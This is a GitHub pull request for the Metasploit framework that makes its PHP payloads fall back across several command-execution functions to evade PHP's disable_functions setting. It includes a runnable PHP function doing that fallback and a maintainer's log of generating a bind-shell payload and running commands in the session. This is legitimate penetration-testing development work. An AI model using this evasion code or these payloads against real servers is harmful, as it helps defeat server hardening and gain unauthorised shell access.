Use php_preamble/php_system_block instead of system in payloads/singles/php/ #19466

Merged (4 commits), Sep 27, 2024

Conversation

@jvoisin (Contributor) commented Sep 17, 2024

The php_preamble/php_system_block combo has built-in low-hanging evasion for PHP's disabled_functions configuration (e.g. system might not be available but shell_exec is), so use it instead of hardcoding system.

This commit also brings modules/payloads/singles/php/reverse_perl.rb's style more in line with the other uses of php_preamble/php_system_block.
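The fallback the PR description relies on, shown as an added example that is not Metasploit's own `php_system_block` (the real generator lives in lib/msf/core/payload/php.rb and emits its own PHP): a hand-written PHP function, `msf_example_run_cmd` (a made-up name), that runs a command through the first execution primitive the target's php.ini left enabled. Note that the php.ini directive is spelled `disable_functions`; the PR text's `disabled_functions` refers to that same setting.

```php
<?php
// Added illustration of the disable_functions fallback discussed in the PR.
// This is NOT Metasploit's php_system_block; it is a hand-written equivalent,
// and msf_example_run_cmd is a made-up name.
function msf_example_run_cmd(string $cmd): string
{
    // Functions listed in disable_functions are already reported as missing by
    // function_exists() (PHP 7 stubs them out, PHP 8 removes them entirely), but
    // the ini check is kept too so the decision is explicit and debuggable.
    $disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
    $usable = function (string $fn) use ($disabled): bool {
        return function_exists($fn) && !in_array($fn, $disabled, true);
    };

    // Try the primitives in turn: whichever one the target's php.ini left
    // enabled is the one that gets used. Each branch returns the command output.
    if ($usable('system')) {
        ob_start();
        system($cmd);
        return (string) ob_get_clean();
    }
    if ($usable('passthru')) {
        ob_start();
        passthru($cmd);
        return (string) ob_get_clean();
    }
    if ($usable('shell_exec')) {
        return (string) shell_exec($cmd);
    }
    if ($usable('exec')) {
        $lines = [];
        exec($cmd, $lines);
        return implode("\n", $lines) . "\n";
    }
    if ($usable('proc_open')) {
        $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
        $proc = proc_open($cmd, $spec, $pipes);
        if (is_resource($proc)) {
            fclose($pipes[0]);
            $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($proc);
            return $out;
        }
    }
    if ($usable('popen')) {
        $fp = popen($cmd, 'r');
        if ($fp !== false) {
            $out = (string) stream_get_contents($fp);
            pclose($fp);
            return $out;
        }
    }
    // Nothing left to try: report which functions the target disabled so the
    // operator knows why no output came back.
    return "no usable command-execution function; disable_functions="
        . ini_get('disable_functions') . "\n";
}

// Stand-alone usage from the CLI.
echo msf_example_run_cmd('id');
```

To watch the fallback happen, run the file with some primitives disabled on the command line, for example `php -d disable_functions=system,passthru example.php`: the `id` output then comes back through `shell_exec` rather than `system`, which is exactly the situation the PR description describes.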

@jvoisin force-pushed the singles_php branch 2 times, most recently from 016e0d0 to 47cbf14 (September 18, 2024 10:36)
…gles/php/

The `php_preamble`/`php_system_block` combo has builtin low-hanging evasion for
PHP's `disabled_functions` configuration (eg. `system` might not be available
but `shell_exec` is), so use it instead of hardcoding `system`.

This commit also brings modules/payloads/singles/php/reverse_perl.rb's style
more in line with the other uses of `php_preamble`/`php_system_block`.

Oh, and it makes lib/msf/core/payload/php.rb work on older Ruby versions as
well.

Co-authored-by: Valentin Lobstein <[email protected]>
@jheysel-r7 (Contributor) commented:

The changes here look good (I just landed the related WordPress specific PR) although the CI test failures are legit.

We have a number of unit tests that run for our different payloads that verify that the CachedSize is as expected. When we update the CachedSize of a payload, we have to update the unit tests as well. Apologies, my first attempt to fix it didn't work; I'll get back to you tomorrow on this.

@jheysel-r7 (Contributor) commented:

I fixed the unit tests, tested the php/bind_perl payload and it's working as expected. Thanks for the enhancement!

msf6 payload(php/bind_perl) > to_handler
[*] Payload Handler Started as Job 0

[*] Started bind TCP handler against 172.16.199.158:4444
msf6 payload(php/bind_perl) >
msf6 payload(php/bind_perl) > generate -o shell.php -f raw
[*] Writing 2049 bytes to shell.php...
msf6 payload(php/bind_perl) > [*] Command shell session 1 opened (172.16.199.158:33675 -> 172.16.199.158:4444) at 2024-09-26 16:22:53 -0800
msf6 payload(php/bind_perl) >
msf6 payload(php/bind_perl) > sessions -i -1
[*] Starting interaction with 1...

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare),998(docker),1001(rvm)
sysinfo
uname -a
Linux ubuntu 5.15.0-92-generic #102~20.04.1-Ubuntu SMP Mon Jan 15 13:09:14 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

@jheysel-r7 jheysel-r7 merged commit 94c1939 into rapid7:master Sep 27, 2024
67 checks passed
@jheysel-r7 jheysel-r7 added the rn-enhancement release notes enhancement label Oct 2, 2024